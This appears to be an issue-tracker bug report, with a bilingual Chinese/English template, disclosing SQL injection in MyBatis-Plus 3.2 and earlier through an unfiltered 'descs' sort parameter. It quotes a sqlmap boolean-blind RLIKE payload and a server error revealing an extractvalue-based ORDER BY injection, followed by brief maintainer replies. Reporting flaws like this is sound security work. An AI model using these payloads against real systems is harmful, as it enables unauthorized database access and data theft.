current version 当前使用版本(必须填写清楚,否则不予处理)
<=version 3.2
该问题是怎么引起的?(最新版上已修复的会直接close掉)
descs parameter can be injection. maybe filter incomplete
Repeat steps 重现步骤
[20:02:02] [INFO] resuming back-end DBMS 'mysql'
[20:02:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: descs (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: current=1&descs=create_time RLIKE (SELECT (CASE WHEN (8251=8251) THEN 0x6372656174655f74696d65 ELSE 0x28 END))&size=20
---
Error message 报错信息
{"code":1,"msg":"\n### Error querying database. Cause: java.sql.SQLException: XPATH syntax error: '~e91175273fd30f58970e3af596ba5cd'\n### The error may exist in com/pig4cloud/pigx/admin/mapper/SysLogMapper.java (best guess)\n### The error may involve defaultParameterMap\n### The error occurred while setting parameters\n### SQL: SELECT id, exception, method, user_agent, update_time, request_uri, del_flag, params, title, type, create_by, create_time, time, service_id, remote_addr FROM sys_log WHERE del_flag = '0' AND sys_log.tenant_id = 1 ORDER BY extractvalue(1,concat(0x7e,md5(1157018949))) DESC LIMIT ?,?\n### Cause: java.sql.SQLException: XPATH syntax error: '~e91175273fd30f58970e3af596ba5cd'\n; uncategorized SQLException; SQL state [HY000]; error code [1105]; XPATH syntax error: '~e91175273fd30f58970e3af596ba5cd'; nested exception is java.sql.SQLException: XPATH syntax error: '~e91175273fd30f58970e3af596ba5cd'","data":null}
Ref:https://gitee.com/log4j/pig/issues/I19XJ2
Comment From: miemieYaho
???
Comment From: samshuai
@miemieYaho mybatis plus未过滤参数,导致的sql注入
Comment From: miemieYaho
自己去过滤